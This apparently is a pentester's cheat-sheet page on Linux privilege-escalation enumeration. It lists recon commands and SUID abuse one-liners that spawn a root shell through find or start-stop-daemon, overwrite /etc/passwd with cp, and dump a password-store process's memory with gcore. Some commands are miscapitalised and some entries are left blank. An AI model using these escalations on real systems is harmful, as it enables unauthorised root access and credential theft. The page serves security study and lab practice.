Linux Enumeration

Check local environment:

env Check Version, issue, architecture:

cat /etc/issue
cat /proc/version
uname -r
uname -a
arch

Check Sudo and GTFObins:

sudo -l
LogoGTFOBins

Networks running:

Ss -antp

Processes:

Ps -aux

Unprivileged Process Monitoring:

LogoGitHub - DominicBreuker/pspy: Monitor linux processes without root permissionsGitHub

Check for shell:

Echo $SHELL

Check for SUID binaries:

LogoGitHub - Anon-Exploiter/SUID3NUM: A standalone python script which utilizes python's built-in modules to enumerate SUID binaries, separate default binaries from custom binaries, cross-match those with bins in GTFO Bin's repository & auto-exploit those, all with colors! ( ͡~ ͜ʖ ͡°)GitHub
find / -perm -u=s -type f 2>/dev/null

  • /usr/bin/find --> find . -exec /bin/sh -p ; -quit

  • /usr/bin/dosbox --> privesc using x11/vnc

  • /usr/bin/cp -> cp passwd.orig /etc/passwd

  • /usr/bin/start-stop-daemon -> /usr/sbin/start-stop-daemon -n foo -S -x /bin/sh -- -p

Sudo:

Enum:

sudo -l
sudo --version
id

Look for:

ALL=(ALL) NOPASSWD:
/usr/bin/gcore -> sudo gcore PID (try password-store) -> string gcore.output

Readers:
vi ->
nano -> 
ed ->

Look for:

- Dirtycow

- Pwnkit

- Polkit

- Dirtypipe

PreviousUnixNextInsecure File Permissions

Last updated